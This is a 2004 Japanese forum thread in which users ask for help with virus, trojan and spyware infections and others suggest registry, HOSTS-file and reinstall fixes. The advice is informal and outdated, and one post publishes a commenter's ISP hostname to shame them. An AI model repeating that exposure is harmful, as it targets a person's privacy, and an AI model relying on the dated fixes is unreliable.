【使用OS】 XP 【WindowsUpdateしてるか】 SP1は入れてません 【AntiVirusは何を使っているか】 ノートン2002(VAIO付属)→バスター2004体験版(古かったので昨日交換) 【ちゃんとUpdateしてるか】 OS入れなおしたので、SP1以降はまだ入れてません 【スキャンした結果(ウイルス名・発見場所)】 インターネット接続して1分後、HP閲覧しなくてもブロック 【別のオンラインスキャンしたならその結果は】 感染は見つかりません。 【症状を具体的に、分かる限りすべて書く】 HP閲覧中に「サーバーが見つかりません。」が多発します。 とにかくずっとバスターのブロックが出ます。 【何をしたらそんなことになったのか】 原因不明です。 【これまでにとった措置】 トレンドのHPから対処法探してMaicrosoftにアクセスしてみたんですけど、英語力無いので何したらいいのかわかりません。 翻訳サイトで翻訳かけてもウィルスの影響かタイムアウトで翻訳できないため対処に困ってます。
ネットワークウィルス名書くの忘れてました。 RPC_DCOM_BUFFER_OVERFLOWってやつです。 対処法よろしくお願いします。
IE、マイコンピュータ、OutlookExpress、JPEG以外のどんなファイル(アプリケーションやショートカット)を 実行しようとしてもメモ帳が開いてしまいます。これは何ですか?ウィルス以外だったらすみません
>>163 ありがとう。。
今からインストールしてみます。
サーバーが見つかりません。が頻繁に出るのは、これが原因なんだろうか・・
>>161 メイン画面→パーソナルファイアーウォール→ネットワークウイルス緊急対策設定
→ネットワークウイルスをブロックして、すべてのネットワーク接続を切断する
のチェックをオフにする。PFWは有効にしておくように。
>>164 拡張子の関連付けを変えられたんだろう。ウイルスの可能性高し。
>>164 に補足です。
どうやら、全ての拡張子(.exeも含む)がメモ帳に関連付けられてしまったようです。
ウィルススキャンしようにも、インストールしてあるNortonが実行できないのでスキャンできません。
>>167 とりあえずノートンの関連付けだけ元に戻せばいいんでないか。
>>169 ギシギシアンアンだったけ?その後、聞かんななぁ・・・。
どんな言い訳しようとも、直リン貼った人にはレスしないことに決めました。
>>171 誤って踏みました
重要なファイルが消えました
>>171 さん、あなたに謝罪と賠償を
あと通報しておきました
175 :
名無しさん@お腹いっぱい。 :04/09/13 20:49:13
IEの等のツールバーにmakeme searchというツールバーが出てしまいました。 スパイウェア系の対策ソフトを使っても削除されません どうやったら削除できるのでしょうか?
avastとAVGどっち選ぶ? って聞かれたから 「どっちも!」 って答えたら、「もういいよばか」って言われた 俺なんか変な事言った?(´・ω・`)
うへぁ誤爆したスマソ
自己解決しました
エロばっか
182 :
名無しさん@お腹いっぱい。 :04/09/13 22:15:33
スパイウェア駆除ソフト使ってたら、突然avastが反応して、Win32:Rameh [Trj]ってウィルスが検出されたんですけど、 詳細見ても英語で訳がわからず、Google検索しても英語サイトしか出てこなくて訳がわからず 結局感染したC:\WINDOWS\System32\atpartners.dllってファイル削除しちゃったんですけど これで大丈夫なんでしょうか?
>>183 自己解決しました。
スパイウェアの一種だったみたいです
185 :
名無しさん@お腹いっぱい。 :04/09/13 22:29:22
ありがとうございます。 しかしどうしても1ヶ月間だけ試してみたいのです。 あつかましいお願いで申し訳ありませんが、 なんとかお願いできませんでしょうか?
190 :
名無しさん@お腹いっぱい。 :04/09/13 23:38:48
メモ帳開くやつなんとかなんない? フォルダオプションで設定しなおしたら直った奴いたが、 やり方教えてー。
>>188 あのー、セキュ板ってウイルス、スパイ・アドウェア、SPAMなど、自分が
要求してないものを勝手に送りつけられることから身(PC)を守ろうという
趣旨で成り立ってるし、当然そんなことする奴は大嫌いな人たちなんで、
これ以上ココで質問しても無駄だと思います。
>>190 状況がよくわからんのだが・・・。キンタマ?
今日になって唐突にウィルスメールが大量に届くようになったんだが、 何かあったかな? W32.Netsky.Q@mmってやつだけど。
193 :
名無しさん@お腹いっぱい。 :04/09/13 23:45:44
164と同じ症状です。ウイルススキャンでは異常なし。
195 :
名無しさん@お腹いっぱい。 :04/09/13 23:52:08
>>188 てめーの垂れ流す糞に興味ねーんだよ死ね
>>193 えーと
>>190 氏か?直リン貼った奴じゃないだろうな?w
フォルダオプション→ファイルの種類→変えたいのを選んで
下の「変更」で関連付け変えていく。
タスクマネージャーやレジストリも見といたほうがいいと思うけど・・・。
>>192 あなたのメアドを登録している誰かが、感染・発症したと思われる。
199 :
名無しさん@お腹いっぱい。 :04/09/14 00:11:25
以下のような警告が頻繁に出るのですが、PCが感染しているのでしょうか? スキャンしても発見できないので困っています。 なお、「W32.Netsky.P@mm!enc」はメールで5通/1日ほどの頻度でウイルスメールが来ているものです。 発生源: C:\DOCUME~1\jmari\LOCALS~1\Temp\CC2F.tmp 説明: ファイル C:\Documents and Settings\jmari\Local Settings\Temp \CC2F.tmp は W32.Netsky.P@mm!enc ウイルスに感染しています。 クリックするとこの脅威についての詳しい情報を表示します : W32.Netsky.P@mm!enc 私のPC情報は以下のとおりです。 MDIBrowser ver. 1.041-p2 [OS] Windows XP Service Pack 1 [IE] 6.0.2800 [Shell32.dll] 6.0.2800 [ComCtl32.dll] 6.0.2800 よろしくお願いいたします。
200 :
199 :04/09/14 00:13:05
書き忘れました。 ウイルスソフトは、ノートンアンチウイルスです。
まりかわいいよまり
203 :
199 :04/09/14 00:41:13
>>202 >コマンドプロンプトから消せば?
これはどうやってやればいいのでしょうか?
PCが感染しているのではなくて、ウイルスソフトが反応してしまっているだけということですか?
たびたびすみません。
>>203 AdministratorでTemporary Internet Filesを見ればあるんじゃね?
>>203 そういう消し方もあるけど、マイコンピュータかエクスプローラーで
C:\Documents and Settings\jmari\Local Settings\Temp\CC2F.tmp
を見つけられないか?見つけられたらそれ削除
(フォルダオプションの表示で「すべてのファイルとフォルダを表示する」にチェック
「保護されたオペレーティングシステムファイルを表示しない(推奨)」のチェックを
外しとくこと)
>>203 205でダメならこれ
1.スタートメニューからプログラム→アクセサリ→コマンドプロンプトを実行。
2.プロンプト(「>]マーク)の直後に「cd \」と入れて、リターンキーを押す。(これは呪文のようなものです。必須)。
3.次に同じく半角で「del」と入力し、そのあとに半角空白を入れる(重要)
4.そして、C:\>del "\Documents and Settings\jmari\Local Settings\Temp\CC2F.tmp"
↑ 前後に引用符をつける(重要) ↑
として、リターンキーを押す。
ファイル消せたら、再度スキャンしてください。
207 :
199 :04/09/14 01:15:40
>>204 >>205 、ありがとうございます。
205氏のやり方でやってみましたが、見つかりませんでした。
ノートンの履歴を見ると「検疫済」となっていたのでもう削除されているのかもしれません。
ただ特にネットサーフィンしているときでもなく、メールを受信しているのでもないときに、
警告が出るのはどういうわけなのでしょうか?
ウイルススキャンでは見つからないけれども、感染しているということなのでしょうか?
208 :
199 :04/09/14 01:16:40
>>206 さん、ご丁寧にありがとうございます。
これからやってみます。
209 :
190 :04/09/14 01:22:04
>>197 拡張子とファイルの種類とやらが出てきたが、どれをどれに変更すればいいのやら…。
>>209 いや、漏れもおまいのPCのアプリでどう関連付けしてるかまでわからんのよ。
XPの基本ソフトも多いし。
データファイルは退避させて、OS再インストール、アプリ再インストールの方が
早いかもわからん(ウイルス駆除になるかもしれないし)。
差出人 : Technical Assistance <
[email protected] >
送信日時 : 2004年9月13日 14:50:50
宛先 : "User" <
[email protected] >
件名 : current internet patch
Qd.exe (0.14 MB)←添付でついて来たけどこれ何?
こんなメールがマイクロソフト宛から来たんだけど
明らかにドメイン違ったんで怪しいと思い削除しますた。
(てかマイクロソフトを詠うかのような内容でした)
この手のメール若しくは送信先でご存知の方いたら
教えてー
>>212 でした
幸いウイルス検知はしなかったのでよかったものの
送信アドレスに対してサーバー側で受信できないよう
設定しときました
ちなみにWEBメールからの受信です(フリーMAIL)
214 :
名無しさん@お腹いっぱい。 :04/09/14 02:46:42
はああ…。 結局リカバリー…。
215 :
名無しさん@お腹いっぱい。 :04/09/14 03:10:51
ウィルスバスターのオンラインチェックで C¥WINNT\downroadedPROGRAMFILES¥tl7000.DLLというファイルに 「TROJ_SOBIT.A」と言うトロイが感染していると出てきたんですが 検索をかけても該当のファイルが出てきません 再度ウィルスチェックをかけるとファイルはあることになっているのですが どうしてでしょうか?わかる人いませんか(;´Д`)
>>190 「コントロールパネル(クラシック表示)」→「フォルダオプション」→「ファイルの種類」
→「新規」で「ファイルの拡張子」に「exe」を入力、詳細設定をクリックして「関連付けられているファイルの種類」で
「アプリケーション」を選んで「OK」→同じ方法で拡張子「lnk」の関連付けを「ショートカット」にする
これで大体は動く。それ以外の拡張子の関連付けも手動で直せばOK。
>>216 あ、ちなみに当方のマシンはxpなので、それ以外だったら知りません。
218 :
名無しさん@お腹いっぱい。 :04/09/14 08:29:44
XPです。 どこかのサイトの掲示板からウイルスをもらってしまいました・・・ ファイル名は確か、「clash me」だったと思います。 ノートン先生で「検疫しました」と出たのですが、これはウイルスがPC内から消えたと捉えてよろしいのでしょうか?
219 :
218 :04/09/14 08:31:50
すみません。ウイルス名は Troja Ho・・・何とかでした。
>>218-219 まずマニュアル読め。次にぐぐれ。それでも解らなければシマンテックに聞け。
お前の書いた内容は、以下と同じ。こんなんで誰が判るんだ?
「今日、田中って人が来たけど、犬が吠えたから追い返しました。
これって悪徳業者から身を守ったと考えてよろしいのでしょうか?
会社名は・・・何とか有限会社でした」
>>220 ワラタ でもまぁそんな感じつっても過言じゃねーな
Trojan Horse(=トロイの木馬)はウィルスの種類の通称なので、それじゃわからないよ
ノートンならシマンテックHPのウィルス辞典で調べてみるといいんじゃねーの?
223 :
名無しさん@お腹いっぱい。 :04/09/14 13:30:40
>>220 219は、
>「検疫しました」と出たのですが、これはウイルスがPC内から消えたと捉えてよろしいのでしょうか?
の部分を聞きたいのでは?
「Troja Ho・・・何とか」がウイルスか否かではなく。
つまり田中さんが帰ったかどうかを(ry
>>223 の解説が正しいものと仮定して
>>219 >これはウイルスがPC内から消えたと捉えてよろしいのでしょうか?
検疫しただけでは消えません。終了
AVGで検索かけるとWarning: Hidden extension .exe ってでて何度AVGで修復かけても引っかかるんですが やっぱ感染してるんですか?
228 :
名無しさん@お腹いっぱい。 :04/09/14 17:31:59
【使用OS、WindowsUpdateの有無】 ME、していない 【オンラインスキャンの結果】 (ウィルス名) TROJ_AOLPS.NM (場所) c:\ProgramFiles\InternetExplorer\○○.exe (すぐ消したので○○の部分は忘れました) c:\_Restore\TEMP\A0127243.cpy 【症状】 exeファイルは8/24に作成されていました。 たまたまスキャンで見つけたので、自覚症状はありません・・・ 【これまでにとった措置】 exeファイルを削除しました。 ウィルス検索でなかったので、似たような名前のTROJ_AOLERSERというのを参考に、 レジストリを調べましたが、特に異常はないようです。 ただ、c:\_Restore\TEMP\A0127243.cpy が”現在使用している”として削除できません。 何かいい方法はないでしょうか?
>228 > ウィルス検索でなかったので、似たような名前のTROJ_AOLERSERというのを参考に、 そういうときは似た名前じゃなくて同じウイルスの亜種を探すべし そうするとNYとかNRとかでてくる…が、ろくな情報がないようだ 念のためWin.iniのRunもチェックして見れ
231 :
228 :04/09/14 18:17:03
232 :
名無しさん@お腹いっぱい。 :04/09/14 20:08:48
【使用OS、WindowsUpdateの有無】 XP、最新 【スキャンした結果(ウイルス名・発見場所)】 Trojan.Ecure (C:\WINDOWS\system.exe) Dialer.Trojan (C:\WINDOWS\seksdialer.exe ) Trojan.ByteVerify (C:\Documents and Settings\〜\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\loaderms.jar-108db11b-6384d35c.zip) 内の (Counter.class) ) の三つを検出。 全て自動的に削除。 【症状】 ウィルスはスキャンしても検出されなくなったのですが、フォルダを開いたり、 IEを起動すると一瞬で閉じてしまいます。ファイル・フォルダの検索も同様に一瞬で閉じます。 【これまでにとった措置】 駄目もとでシステムの復元をしましたが、何も変わりませんでした。 IEも開けないしファイルの検索も出来ないのでどうすればいいのやら・・・ Wordやら2chブラウザは普通に使えるのですが。
233 :
名無しさん@お腹いっぱい。 :04/09/14 21:57:02
スパイウェアかウィルスにやられたらしく、起動後すぐ固まってしまいなにもできない。 めんどくさいからリカバリーしようかと思ったら、CDも動かない。 どうすればよいんでしょ?
>233 まるち
>232 とりあえずTrojan.Ecureの処置として ・IEのスタートページを戻す ・HOSTSファイルの「127.0.0.1 localhost」以外の行を削除 これやってからセーフモードとネットワーク(だっけ?)で起動 これでIEが立ち上がるようならTrendmicroかMcAfeeでオンラインスキャン スパイウェア駆除ツールもいくつか試してみる
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run にある Microsoft Update Machine Winregs32 ってウィルス?
239 :
名無しさん@お腹いっぱい。 :04/09/15 14:55:41
I.E立ち上げるとorgazmってのが落ちてきてエロ画像行っちゃう。ヤフーに設定すると戻るけど再起動すると また来る。プログラムのorgazm exe消しても直りません。どうしたら良いのでしょうか?
>>239 アンチウィルスソフトいれるのと、スパイウェアのチェックをSpybot+Ad-awareSEでやってみろ
241 :
239 :04/09/15 15:33:06
スパイウェアって何でしょうか?すみません。教えてください
>>239 エロ見すぎ
エロサイト見たら・・・助(ry
既出過ぎて、全部書くのマンドクセ
243 :
239 :04/09/15 15:59:52
携帯について調べてたら行ってしまいました。 すみませんがお願いです。
245 :
239 :04/09/15 21:14:21
スパイウェアのチェックをSpybot+Ad-awareSEでしましたがダメでした。 どうすれば・・・・・
僕の肛門がグラッカーにやられそうなのですが、どうすればいいですか? 一応ウイルスバスター2004と、スパイウェア除去ソフト、免疫ソフトを使っています。 最近、肛門のしまりが悪くなってきたので、侵入を許してしまうのではないかと、不安になってます。
248 :
名無しさん@お腹いっぱい。 :04/09/15 22:51:25
windows2000sp4 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductID の値が「きみはじつにばかだな。」になっていました。 これはマイコンピュータ→右クリック→プロパティ→全般タブに表示される値の一つです。 いろいろ検索かけたりしたのですが見つからず、NAVで完全スキャンをかけても戻らず これは何だったのでしょう?
>>247 まず、病院で肛門を縫ってもらいましょう。
そうすると、強制オンラインから、強制オフラインになります。
あつかましいお願いで申し訳ありませんが、 どなたか教えてもらえませんか?友人からの依頼品などもあり どうしてもせっぱつまっているのです。 本当に感謝しますので、どうかお願い!
251 :
名無しさん@お腹いっぱい。 :04/09/15 23:20:42
>>250 厚かましいとかではなくてさ
ここの人と全然関係ない沢山の
人達が被害を被ることになるので
教えられないと思うよ
これって事実上の荒し依頼だよな?>スパム 削除依頼+アク禁対象じゃないか?
>>250 カエレ
できもしないのに、他人の依頼を受けるからだ
自分で何とかしろ
254 :
名無しさん@お腹いっぱい。 :04/09/15 23:56:32
教えて下さい。 ヤフーのフリーメールの方に、度々 W32.Netsky.P@mmという名前のウイルスを含んだメールが 添付されて送りつけられます。 受信拒否にしても、迷惑メールフォルダの方に受信されてしまいます。 どうしたら、よいでしょうか?教えて下さい。
>>254 >どうしたら、よいでしょうか?教えて下さい。
削除する。
256 :
名無しさん@お腹いっぱい。 :04/09/16 00:09:15
>>255 いえ、あのぉ 受信拒否できるようにするには、
何かソフトを入れれば、大丈夫ですか?
【使用OS、WindowsUpdateの有無】
XP pro Ver2002 SP1適用 当時FWは切っていました。。
現在は反省してFWかけています
【使用AntiVirus、Updateの有無】
ノートン アンチ ウィルス 9/14日付けの物に更新
【スキャンした結果(ウイルス名・発見場所)】(オンラインスキャンしたならその結果も)
合計25個程度同時にかかっていたので全て把握できませんでした
大抵の物は既に駆除出来ていると思います
現在自覚のある中でかかっているらしきものは「W32.Klez.gen@mm」、
「W32.ElKern.gen」の2種です
【症状】(具体的に、分かる限りすべて書くこと。何をしたらそんなことになったのかも)
最初はデスクトップのゴミ箱のアイコンを右クリックするとエクスプローラがフリーズする、
タスクマネージャが一瞬立ち上がった後すぐに自動的に終了してしまう、
MSNメッセンジャやIRCが今までにないような頻度で切断される という感じでした
その後症状を元にググって見た結果、klezというのに類似しているように見受けられたので
シマンテックのサイトの下記「W32.Klez駆除ツール」を実行すると
ttp://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html 「Neither W32.Klez.gen@mm nor W32.ElKern.gen were found on your computer.」
との結果が出て、その後それまでは普通に実行できていたはずのレジストリエディタまで
立ち上がらなくなりました
原因のほうはいつの間にかなってしまったので把握できていません
【これまでにとった措置】
NAV、AD-awareでのスキャン、klez用駆除ツール
自分ではこれで精一杯でした。。
どうかお知恵をお貸し下さい
すいません 記載に漏れがありました WinUpdateも最新のまで入れてあります このWinUpdateする際にも、何度自動更新しても同じファイルを落とし続けるので MSのサイトから直接ファイルをDLして手動インストールしてみたところ インストール実行中にウィザードが強制終了してしまっていました その問題はセーフモードでインストールを実行することで回避出来ました
259 :
名無しさん@お腹いっぱい。 :04/09/16 02:58:37
皆さん相談に乗ってください。 知り合いがパソコンを買う予定なのですが、金が無いらしいので、 中古のOS 2000 良くてもペン3の500とか、メモリもまあ128とか256ぐらいになると思います。 ネットと、メールぐらいしかしないらしいので、それぐらいでも十分かなーと思いますが、 ノートンとか、バスターを入れると、スペック的な厳しさの心配があり、 さらにパソコン触った事無いぐらいの人なので、設定の仕方とかも良く分からなそうです。 だからセキュ的には、やっすいルーターと、プロバイダーのウィルスチェックで何とかなるかなーと思ってるのですが、 甘いっすかね?
>>257 「Neither W32.Klez.gen@mm nor W32.ElKern.gen were found on your computer.」
これはKlezが駆除できたというメッセージ
メッセンジャー・IRCの症状はKlezだろうけど、エクスプローラやタスクマネージャのほうは
おそらくトロイによるものだと推測
25個もの感染があったなら、その中にはレジストリを改変するものも含まれてたんじゃないかな
そういう場合は手動で書き換えられたレジストリを元に戻さなければいけないわけで
もう原因が特定できない状態だから、OS再インストールしたほうが早い
この板のHijackThisスレかPC初心者のエロサイトスレでログを見て貰うという手もあるけど、
それで元通りになるとは限らない
無駄に時間使うだけになるかもしれないし
261 :
名無しさん@お腹いっぱい。 :04/09/16 03:26:29
デスクトップの背景が蓮画像になったのですが、 こちらで質問させてもらってよろしいでしょうか? All userのスタートアップの所に” .exe”という 怪しいファイルを見つけたのですが、これが犯人と思ってよろしいのでしょうか? ちなみにwinnyは使ってないです。 オンラインスキャンをしても反応しませんでした。 ググるためのヒント(正式名称)などを教えていただけたらと思います。
>>259 甘い
初心者に限って何でもパカパカリンク踏むもんだし、
ウィルス感染は何もメールだけに限ったものではない
設定の仕方も解らない人間なら、ネットに繋いだ瞬間にsasser等に感染するのがオチ
感染したら本人だけの問題ではない、周りも迷惑こうむるし
そのスペックなら厳しいけども、ノートン、バスターともに入れられないわけじゃないでしょ
私が最初に使ってたPCがそれとよく似たスペック(OS2000 K-6 550 メモリ256)で
Norton Anti Virus と Black ICE が入ってた
男性ならエロサイト巡りは絶対と言っていいほどするだろうし、
少々の重さを我満してもセキュリティ対策は取っておいたほうがいいと思う
>>259 甘い。
アンチウィルスソフトも、ファイヤーウォールも、スパイウェア対策ソフトも
全部無料で手に入れられる時代だ。最低限でもそのぐらいは入れた方がいい。
セキュリティ板のスレッドを回って情報を集めた方がいいよ
>>264 どうみても
>>261 はネタだろ。本当に知らなかったらこんな事書かない
>ちなみにwinnyは使ってないです。
>ちなみにwinnyは使ってないです。
>ちなみにwinnyは使ってないです。
Winnyやってないなら訳のわからないものをダウンロードするからだ
スレ違いだと最初からわかってるか、nyやってて感染して聞いてるだけだろ
ここでは誰も回答する気も起きないと思うよ、あきらめな
>>261 蓮の犯人はここに登録されているファイルです
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
: imjpmig
>>261 ちなみにOfficeのIMEのキーを使っているから、Microsoft Officeをインストールしている人しか
実害は被りません
268 :
名無しさん@お腹いっぱい。 :04/09/16 10:54:53
>>257 >合計25個程度同時にかかっていたので全て把握できませんでした
NAVによってスキャンしたのなら
レポート→活動ログ→Norton AntiVirus→脅威警告
にそのときのログが残っているはずだけど。
269 :
261 :04/09/16 11:19:34
>>267 皆さん、回答ありがとうございます
実害とありますが、winnyを狙ったものならば、
使ってなければ影響は無いのでしょうか?
違う違う! ここにはすごいスキルのありそうな人が 多いのでお願いしているのです。 ぶっちゃけた話、自分の周りに東大の工学部を 出ているような人は誰もいません。 でもここにはそれ以上の頭脳とスキルを持ったツワモノが 潜んでいると思うのです。何故なら このお願い事は東大の工学部でも難しいレベルだと思うからです。
>>271 火星大学あたりでスカウトして恋♥
あした日の出桟橋から船が出るから。
チケットはコンビニで買える
1.島を手に入れる 2.独立を宣言する 3.国外へのインターネット回線を引く 4.メールサーバを島に置く 5.メールを出す
>>274 なるほど!
それなら私にも出来そうですね。
目から鱗が落ちました。
ありがとうございました!
277 :
名無しさん@お腹いっぱい。 :04/09/16 18:02:20
海賊版コピーからユーザーを守るってどういうこと?
279 :
名無しさん@お腹いっぱい。 :04/09/16 18:20:41
教えて下さい。 うちのPC、夜中になると勝手に家中動き回ってるみたいなんですが どうしたらいいでしょうか?
≫279 縛っとけ!
>>279 夢遊病の癖があるようですね
初期出荷不良です サポートに電話して下さい
282 :
名無しさん@お腹いっぱい。 :04/09/16 18:57:27
相談させてください。ウィルスメール(W32.Netsky.P)が日に10通ちかく 届くようになり、ヘッダからプロバイダを割り出して、ヘッダ情報を添えて 該当プロバイダに連絡しました。 返事がきたのですが、 ・同一IPを多くの人が使っているからウィルス感染者はわからない ・このヘッダも偽装かもしれないから信用できない ・全ユーザーにウィルスに気をつけるよう注意を促すようにはする ということで、何の対処もしてもらえないようです。 こういう無責任プロバイダを取り締まってくれるような団体ってないですかね?
10通/日程度で騒ぐことか?
>>280 GJ! (・∀・)イイ!!
(´-`).。oO( なんでメアドだろう… )
そこにメール欄があるからじゃない?
あぼーん
c124248.net21845.cablenet.ne.jp ↑厨のip
288 :
名無しさん@お腹いっぱい。 :04/09/16 21:38:14
質問させてください。この11月でセキュリティーソフトの更新サービス が切れるのですが、今使ってるのがノートンインターネットセキュリティ 2003なんで新しいパッケージのやつに買い換えなきゃどうなのか悩んでます。 そこらへんに詳しい方どうしたらいいかおしえてください
289 :
名無しさん@お腹いっぱい。 :04/09/16 21:51:14
>>288 更新サービスが切れてから後はどうしたいの?
ノートンを正規に使い続けたいのなら買わなければいけないけども。
290 :
名無しさん@お腹いっぱい。 :04/09/16 21:57:59
>>289 サービス延長キーを買うか、2005に買い換えるか、どっちがいいんでしょうか?
2003でも問題なければまた延長キーを買おうと思ってます。更新が2回目だったので
皆さんどうされてるのかと思いまして。
291 :
名無しさん@お腹いっぱい。 :04/09/16 22:09:24
>>290 どうせ買うなら 2005にしてみれば。
292 :
名無しさん@お腹いっぱい。 :04/09/16 22:29:27
Windows 2000 で、ログイン画面が逆さまになって、ログインするとデスクトップも逆さまになってしまった。 こんなウイルスある?
293 :
名無しさん@お腹いっぱい。 :04/09/16 22:32:15
すいません、ウィルスで教えてもらいたいのですが、 さっきNorton AntiVirusでwinfix3というウィルスを発見したんです。 強制終了すれば消せると思い、 Alt+Ctrl+Deleteでwinfix3のタスクマネージャでプロセスを終了したんですが、 winfix3が起動していて消せません;-: どうやったらwinfix3を消せるんでしょうか? あとwinfix3に関係しているファイルがあるんでしょうか? 消したいので教えてください!お願いしますm_m
>>292 なんだか楽しそうねw
私は聞いたことないな
>>292 ウイルスじゃねえけどそういうことはある
原因はなんだっけな
298 :
292 :04/09/16 23:32:52
>>297 グラフィックコントローラ(Intel)にそういう機能が有るけど設定ボタンが押せない状態になっていて切り替えられない。
ウイルスじゃ無さそうなので、別の所で聞いてみます。
すいません、質問させてください さっきトレンドマイクロのオンラインスキャンしたところ WORM_SDBOT.ORってのが発見されたんですけど、駆除できません。 このSDBOTの亜種だと思ってググってみても、ORというのは発見できませんでした。 駆除のための助言をいただけませんか?
遅レスすいません
いろいろ試してたものでレス遅れました
>>260 OS再インストールも考えてみます。。
>>268 レポートは白紙でした。。
NAVだけじゃ不安になったのでバスターのオンラインスキャンもやってみた結果
新たに「BAT_SASSER.A」「WORM_WOOTBOT.G」「REG.LOWZONES.A」というのにも
かかってしまっていたみたいでした
その後ベンダサイトでSASSER用駆除ツールをDL、実行等他の作業をしていて
全部消えたか確認のために再度オンラインスキャンを実行してみると
さっきまでは存在していなかった「TROJ_BOTIRC.A」というトロイが新たに発見されてしまい
そのトロイの解説には「侵入方法:メール送信やネットワーク越しの感染などはありません。
人間によるファイルの受け渡しによってのみ他のコンピュータに頒布されます。」
とあるのですが1回目のスキャンから2回目のスキャンの間までにDLしたのはSASSER用駆除ツールのみで
他に他人からファイルの受け取りなどはしていませんでした
そのほかにAPC.exe、net.exe、pp1.exe、soundm0n.exe、cmd.exeといったプロセスが
大量に立ち上がりパフォーマンスが著しく低下しだしてしまいます
APCなどは何度消しても復活してしまいます。。
どこからかバックグラウンド上で勝手にウィルスを収集するウィルス などは
あるのでしょうか?
>>299 最近パターンファイルに載った奴で、解説はまだできてないんだろう。
これを機に常駐のアンチウイルスソフト買うのが良いと思うが、どうか?
>>300 よくあるのかどうかしらんが、俺も似たようなことがあった。
トロイAにウイルスBを感染させると、1回目のスキャンでは
ウイルスB検出駆除、2回目のスキャンでトロイA検出隔離
ってな感じ。
でもトロイだと何らかの形で実行してもらわんとなー。なんで
そんな怪しげなプロセスが発生するのかワカラン
>>300 ありえる。というかもしかしたらウィルスじゃなくスパイウェアかもね。
Ad-awareはやっているみたいだが、これはAd-awareSEの最新の定義でやってるか?
Spybotは入れてみてやってみたか?
ファイヤーウォールソフトは入れているか?
(バックグラウンドで勝手に収集するウィルスなら、ファイヤーウォールで
「ネットに接続しようとしていますが・・・」と出るはず)
常駐のアンチウィルスソフトは最新の定義のNAV2004が入っているんでしょ?
306 :
名無しさん@お腹いっぱい。 :04/09/17 18:38:03
皆さん助けてください! インターネットを開いたらいつもはyahooのはずが、変なサイトがいっぱい出てきて直りません! インターネットオプションから直そうとしても灰色になっててクリックできません! どうしたらいいんでしょうか!? どうか教えてくださいお願いします!
308 :
名無しさん@お腹いっぱい。 :04/09/17 20:55:00
最低でもOSがセーフモードで動かないと、ウィルスソフト買っても意味ないでしょうか? それと、ファイアウォールの良し悪しというのはあるのですか? あるとすれば、どこで判断するのですか?
>>303 Ad-aware、NAVともに最新の物になっています
Spybotも試した結果CnsMin等が引っかかりましたがそちらは駆除できたみたいです
FWはWinの純正?のものはかけてあるとおもいます
>>308 ではそちらのスレでお世話になってきます
レス下さった方々ありがとうございました
>>308 駆除ソフトは買って損することはないと思う。
よくわかんないなら市販されてる有名企業の物をかっとけ
311 :
名無しさん@お腹いっぱい。 :04/09/18 04:51:26
質問です。 某サイトを知り合いが踏んでPCがおかしくなったらしいので 自分がチェックしたところ MHTMLRedir.Exploit Trojan.horse Download.trojan Download.ject Trojan.ByteVerify が検出されました。知り合いいわく 「画面が青くなり、〜〜%と表示される(自分もここまではなりました) そしてPCを立ち上げると、デスクトップに変なショートカットが出来てて、デスクトップまでたどり着いた瞬間に 特定のプログラムを実行したと思ったらフリーズしてしまう」らしいんです。IEのブラウザを大量に開いてるのかも と自分は思ったのですが。 でシマンテックで調べると、 Trojan.ByteVerify これの症状が発生してるのかなと思ったのですが、この場合どう対処すれば いいでしょうか?OSはMEです。
312 :
名無しさん@お腹いっぱい。 :04/09/18 05:45:41
質問させてください。office製品を開こうとするとインストーラーの準備を開始してしまいます。 昨日まで使えたワードやエクセルが使えません。シマンテックでウィルス感染を見つけ削除はしました。 そんなウィルスあるのでしょうか?調べたけどなさそうなんですが。
313 :
名無しさん@お腹いっぱい。 :04/09/18 06:53:51
>>311 >>313 どうせ両方とも常駐するアンチウィルスソフト入れてないんだろ?
これを機に入れておけ、でファイナルアンサー。無料のもあるんだから調べてみろ。
>>312 OfficeUpdateの関連じゃねーの。CDがあれば問題はないはず
割れユーザーなら残念でした
315 :
名無しさん@お腹いっぱい。 :04/09/18 08:26:47
アンチウィルスソフトというのはNorton Internet Securityとは 全く別物なんですか? 今までそれがあるから大丈夫だと思っていたのですが。。
>>315 Norton Internet Securityはアンチウイルスソフトだよ。
ただし過信は禁物。
レジストリは記述が無いなら大丈夫だと思うが、念の為再スキャンしとけ。
それとWindowsUpdateはきちんとやっとけよ。
>>316 ありがとうございます。
レジストリ見てみたもののそれらしきものはなさそうなので
再スキャン&WindowsUpdateして再起動してみます。
あ、ごめん。もろに
>>313 でNIS入れてますって書いてあったな
>>314 の書きこみは無視しちゃってくれ
すいません ウイルスが感染して悩んでします 治し方を教えてください xpで起動してログインすると ノートン:ウイルス警告 Back。Aent。Bに感染 RUNDLL:指定されたモジュールが見つかりません Online Windows Spy Test: Warning! Welcome The System Perfoemance Wizart: サーバーが見つかりません:20個開きます Already running!!! システマックの駆除ツール CWShredder a2 Spybot HijackThis はすべて試してみましたが 駆除できません どうすればいいのでしょう?
再インスコ
すいません 再インストールってやってことがないのですが 初心者でも簡単なんでしょうか パソコンはドスパラで買って一応組み立てアニュアルという冊子は付いてますが いまいち 自信がありません
323 :
名無しさん@お腹いっぱい。 :04/09/18 19:02:02
ヒタチのプリウスを使っていますが、立ち上げたあと黒い画面の上の方に白いハイフンが点滅したまま次の画面になりません。ウイルスでしょうか。またどうしたら治りますでしょうか。よろしくおねがいします。
マイクロオンラインスキャンで TROJ_ISTBAR.Wというウィルスが見つかったので、 ファイルを削除してスキャンしてみた所、 何度検索してもDownload programfile CONFLICT.1¥STactiveX.dllと ISTactivex.dllというファイルが検出されます。 フォルダ内を見ても、この2つのファイルは見つかりません。 どうすれば、削除できるのでしょうか? どなたかご回答よろしくお願い致します。
326 :
名無しさん@お腹いっぱい。 :04/09/18 19:38:13
マカフィーの体験版を使用してるのですが、「ウィルススキャン」をインストールしてから 「パーソナルファイアウォールプラス」をインストールすると、途中で停止するのですが どうすればよいでしょうか? インストール中”application ・・・”というところで停止してしまいます。 よろしくお願いいたします。
すいません CDROMで再インストールしてみましたが 感染状態は変わりませんでした やはり ハードディスクの初期化をしなければいけないのでしょうか 一応 グーグルで検索してみたのですが 使っているハードディスクの初期化のやり方がわかりません どなたか教えてください
